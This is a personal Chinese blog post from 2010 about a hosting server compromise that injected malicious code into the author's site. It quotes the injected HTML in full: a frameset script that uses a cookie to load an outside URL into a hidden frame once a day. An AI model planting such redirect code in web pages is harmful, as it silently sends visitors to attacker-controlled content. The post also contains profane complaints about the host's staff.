服务器被挂马

2010年1月27日 | 分类: | 标签: ,

今晚回家打开博客,当然不是这个,是另外一个,按照自己的习惯随便乱点一下链接。这时发现了问题,网页没有显示标题,地址栏的网址没有变化,马上进行排查。关了浏览器再开、试其他网站、宽带重新拨号、电脑重启,确认网站被挂马了,再检查发现以下代码:

<html><HEAD>
<SCRIPT>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://www.51hxbb.com/bbs/9.htm";}
}
</SCRIPT>
</HEAD><FRAMESET onload=showme() rows=100%,*><FRAME src="/articles/the-season-of-fate.html?UpdatedPage=aGlqYWNr" name=hello><FRAME src="" name=hi></FRAMESET></html>

继续排查,检查网页源代码发现不了那里有出错,直接把网站打包下载来搜索,一样发现不了被修改的代码。在空间商后台提交问题,之后自己google了一下,发现很多这种挂马问题,而且大多数都说是服务器挂马。细心的我马上查同一IP下的网站,发现每一个都跟我一样的情况,这是终于确定了是服务器问题,马上继续提交问题。可值班的不知道是那个烂技术员,说了几遍都没发现问题,还叫我打开其他网站测试,我肯定自己排查过才认定是你公司服务器问题啦。写这文章前再次问了他们客服,说已经在处理了。这垃圾网管真垃圾。

PS:
10点23分,直到文章写完,问题还没解决。操。
10点52分,后台答复说:估计是一种新的arp现在估计很难查到。要明天去机房处理已经处理,请核实! 日,就是查不出问题,操NND烂网管。
第二天上班打开已经没事了。
1月29日后续,早上收到一个电话,是西部数据打来的,原因是我那天晚上在他们的投诉页面中提交了投诉,所以他们打电话来做回访。

声明: 本文遵循 BY-NC-SA 3.0 协议. 转载请注明转自: 服务器被挂马
支持本博发展,请勿过滤广告。
目前还没有任何评论.
XHTML: 您可以使用这些标签: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

注意: 评论者允许使用'@user空格'的方式将自己的评论通知另外评论者。例如, ABC是本文的评论者之一,则使用'@ABC '(不包括单引号)将会自动将您的评论发送给ABC。请务必注意user必须和评论者名相匹配(大小写一致)。